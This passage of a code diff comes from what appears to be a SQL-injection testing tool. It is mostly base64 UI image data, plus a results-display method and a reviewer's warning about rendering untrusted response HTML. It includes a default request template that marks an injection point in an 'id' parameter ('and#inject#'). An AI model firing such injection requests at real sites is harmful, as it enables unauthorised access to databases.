Av8C3AL/Ae8B/wHvAv8J3AL/Ae8CAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPEQAB7w3/Ae8B/wHv + Df8B7wIAAVYCmAWXAQgB/wHzApgBTxEAAe8B9AvyAfQB7wH/Ae8B9AvyAfQB7wIAAZgBlwEIBpcBCAGX + AQgBUAGXEQABtA2zAbQB/wG0DbMBtAIAAQgBVgF4AQgGlwEIAXgBTwEHEQABswEJC9wBCQGzAf8BswEJ + C9wBCQGzAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYEgABswHhC9sB4QGzAf8BswHhC9sB4QGzBAABmAFW + AZcEmAGXAVABmBMAAbMN4gGzAf8Bsw3iAbMFAAEIAZgEVgGYAQcUAA+zAf8Bug2zAbohABD/IAABEg5D + ARIB/w7UAf8gAAFtDv8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAA4HAgAIBwaXAQABbQH/ + ARUEEQEQAxEBEAERARQB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/ + AQcCAAEHAv8BBwT/AZcECAGXAQABbQH/AeoC/wG8A/8BvAP/AeoB/wFtAf8B1AIZAfQC/wH0ARkBCQPc + AQkB1AH/AQABBwL/AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAFtAf8B6gG8AQcBvAMHAbwCBwG8 + AeoB/wFtAf8O1AH/AQAOBwIACAcGlwEAAesB/wFtAv8BvAP/AbwD/wFtAf8B6wH/AdQC3AEZAvQBGQHc + AdsB2gHTAdQB2wHUAf8BAAEHAv8BBwT/AQcE/wEHAgABBwL/AQcE/wGXBAgBlwEAAesB/wFtAfAIvAHw + AW0B/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/AQcCAAEHAv8BBwT/ + AZcECAGXAQAB6wH/AesC/wHwA/8B8AP/AesB/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEA + DgcCAAgHBpcBAAHrAf8B6wIZAfEG8gHzAesB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQABBwL/ + AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQElASABGQcCAewB/wHsAf8O1AH/AQABBwL/ + AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQImAfQBNAVVATQB7AH/AewB/wHUAtwBGQL0 + ARkB3AHbAdoB0wHUAdsB1AH/AQAOMwIACDMGNAEAAewB/wHsARkI8wH0AewB/wHsAf8B1ALcARkC9AEZ + AdwB2wHaAdMB1AHbAdQB/wEAATMCNAEzATQCVQE0ATMBNAJVATQBMwIAATMCNAEzATQCVQc0AQAB7AH/ + AewC/wHzA/8B8wP/AewB/wHsAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAOMwIACDMGNAEAAewB/wzs + Af8B7AH/DtQB/yAAAewO/wHsEP8gABDtAUIBTQE+BwABPgMAASgDAAFAAwABIAMAAQEBAAEBBgABARYA + A/8DAAT/BQABAQHwAQ8FAAEBAeABBwUAAQEBwAEDBQABAQGAAQEFAAEBAYABAQUAAQEBgAEBBQABAQGA + AQEFAAEBAYABAQUAAQEBgAEBBQABAQGAAQEFAAEBAYABAQUAAQEBwAEDBQABAQHgAQcFAAEBAfABDwUA + AQEC/wQABP8EAAT/BAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA + AQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA + 
AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs= + + + + 278, 55 + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + 538, 55 - 531, 14 + 747, 17 AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAAC - EwAAAk1TRnQBSQFMAgEBCgEAAUgBBwFIAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo + EwAAAk1TRnQBSQFMAgEBCgEAAXABBwFwAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo AwABQAMAATADAAEBAQABCAYAAQwYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA 
@@ -215,168 +375,8 @@ BP8BwAEAAfwBPws= - - 279, 9 - - - 1218, 14 - - - 157, 52 - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG 
- YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - 404, 11 - - - 267, 52 - - - - AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w - LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 - ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq - DQAAAk1TRnQBSQFMAgEBBwEAAcgBBgHIAQYBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo - AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA - AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 - AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA - AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm - AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM - AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA - ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz - AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ - AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM - AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA - AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA - 
AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ - AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/ - AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA - AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm - ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ - Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz - AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA - AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM - AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM - ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM - Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA - AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM - AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ - AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz - AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm - AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw - AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAEP8wAA/vAf8PvAUA - AQcBcgFPA0kBcgEHFAAP7wH/D+8EAAGYAU8BUASYAU8BSQEcEwAB7w3/Ae8B/wHvDf8B7wMAAZgBTwF4 - AQgBmAKXAZgBCAGXAUkBHBIAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABBwFPAXgBCAaX - AQgBlwFJAQcRAAHvAf8C3AL/AtwC/wLcAv8B7wH/Ae8C/wncAv8B7wIAAXgBVgEIApcBeAEbAZgDlwEI - AU8BchEAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7w3/Ae8CAAFQApgBlwF4A/8BmAKXApgBTxEAAe8B/wLc - Av8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABTwGYAZcBeAL/AfQC/wGYApcBmAFJEQAB7wH/AtwC/wLc - Av8C3AL/Ae8B/wHvAv8J3AL/Ae8CAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPEQAB7w3/Ae8B/wHv - Df8B7wIAAVYCmAWXAQgB/wHzApgBTxEAAe8B9AvyAfQB7wH/Ae8B9AvyAfQB7wIAAZgBlwEIBpcBCAGX - 
AQgBUAGXEQABtA2zAbQB/wG0DbMBtAIAAQgBVgF4AQgGlwEIAXgBTwEHEQABswEJC9wBCQGzAf8BswEJ - C9wBCQGzAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYEgABswHhC9sB4QGzAf8BswHhC9sB4QGzBAABmAFW - AZcEmAGXAVABmBMAAbMN4gGzAf8Bsw3iAbMFAAEIAZgEVgGYAQcUAA+zAf8Bug2zAbohABD/IAABEg5D - ARIB/w7UAf8gAAFtDv8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAA4HAgAIBwaXAQABbQH/ - ARUEEQEQAxEBEAERARQB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/ - AQcCAAEHAv8BBwT/AZcECAGXAQABbQH/AeoC/wG8A/8BvAP/AeoB/wFtAf8B1AIZAfQC/wH0ARkBCQPc - AQkB1AH/AQABBwL/AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAFtAf8B6gG8AQcBvAMHAbwCBwG8 - AeoB/wFtAf8O1AH/AQAOBwIACAcGlwEAAesB/wFtAv8BvAP/AbwD/wFtAf8B6wH/AdQC3AEZAvQBGQHc - AdsB2gHTAdQB2wHUAf8BAAEHAv8BBwT/AQcE/wEHAgABBwL/AQcE/wGXBAgBlwEAAesB/wFtAfAIvAHw - AW0B/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/AQcCAAEHAv8BBwT/ - AZcECAGXAQAB6wH/AesC/wHwA/8B8AP/AesB/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEA - DgcCAAgHBpcBAAHrAf8B6wIZAfEG8gHzAesB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQABBwL/ - AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQElASABGQcCAewB/wHsAf8O1AH/AQABBwL/ - AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQImAfQBNAVVATQB7AH/AewB/wHUAtwBGQL0 - ARkB3AHbAdoB0wHUAdsB1AH/AQAOMwIACDMGNAEAAewB/wHsARkI8wH0AewB/wHsAf8B1ALcARkC9AEZ - AdwB2wHaAdMB1AHbAdQB/wEAATMCNAEzATQCVQE0ATMBNAJVATQBMwIAATMCNAEzATQCVQc0AQAB7AH/ - AewC/wHzA/8B8wP/AewB/wHsAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAOMwIACDMGNAEAAewB/wzs - Af8B7AH/DtQB/yAAAewO/wHsEP8gABDtAUIBTQE+BwABPgMAASgDAAFAAwABIAMAAQEBAAEBBgABARYA - A/8DAAT/BQABAQHwAQ8FAAEBAeABBwUAAQEBwAEDBQABAQGAAQEFAAEBAYABAQUAAQEBgAEBBQABAQGA - AQEFAAEBAYABAQUAAQEBgAEBBQABAQGAAQEFAAEBAYABAQUAAQEBwAEDBQABAQHgAQcFAAEBAfABDwUA - AQEC/wQABP8EAAT/BAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA - AQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA - AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs= - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - 
YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - 417, 52 - - 17, 52 + 138, 55 GET /access.asp?id=1<Encode> and#inject#</Encode> HTTP/1.1 @@ -391,24 +391,27 @@ Pragma: no-cache Cache-Control: no-cache,no-store - 988, 14 + 1204, 17 - 806, 14 + 1022, 17 - 648, 14 + 864, 17 + + + 17, 17 - 608, 52 + 729, 55 - 729, 52 + 850, 55 - 852, 52 + 973, 55 - 61 + 108 \ No newline at end of file 
diff --git a/SuperSQLInjection/ShowResponse.cs b/SuperSQLInjection/ShowResponse.cs index 8fbd329..d7e2763 100644 --- a/SuperSQLInjection/ShowResponse.cs +++ b/SuperSQLInjection/ShowResponse.cs @@ -29,6 +29,17 @@ namespace SuperSQLInjection this.webBrowser1.DocumentText = this.server.body; } + public void setResult() + { + this.txt_requestHeader.Text = this.server.reuqestHeader; + this.txt_requestBody.Text = this.server.reuqestBody; + this.txt_responseHeader.Text = this.server.header; + this.txt_responseBody.Text = this.server.body; + + this.webBrowser1.ScriptErrorsSuppressed = true; + this.webBrowser1.DocumentText = this.server.body; + } + private void txt_responseBody_KeyDown(object sender, KeyEventArgs e) { if (e.Modifiers == Keys.Control && e.KeyCode == Keys.F) diff --git a/SuperSQLInjection/SuperSQLInjection.csproj b/SuperSQLInjection/SuperSQLInjection.csproj index 24e0c99..5a3ccc9 100644 --- a/SuperSQLInjection/SuperSQLInjection.csproj +++ b/SuperSQLInjection/SuperSQLInjection.csproj @@ -123,6 +123,7 @@ Main.cs + @@ -137,7 +138,7 @@ - + @@ -165,6 +166,8 @@ + + @@ -264,7 +267,6 @@ true -
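Review bot: In ShowResponse.cs, `setResult()` assigns the raw response body to `webBrowser1.DocumentText`, so markup and script returned by the remote server are rendered by the embedded browser control inside the tool's own process, and `ScriptErrorsSuppressed = true` hides any sign that script ran. The body is untrusted content; showing it only in `txt_responseBody`, or making the rendered preview opt-in, keeps a hostile response from acting on the operator's machine. The context line just above the hunk makes the same `DocumentText` assignment, so the existing code there could presumably call `setResult()` instead of repeating it. At minimum a comment such as `// server.body is untrusted; this preview renders it as active HTML` belongs above the assignment.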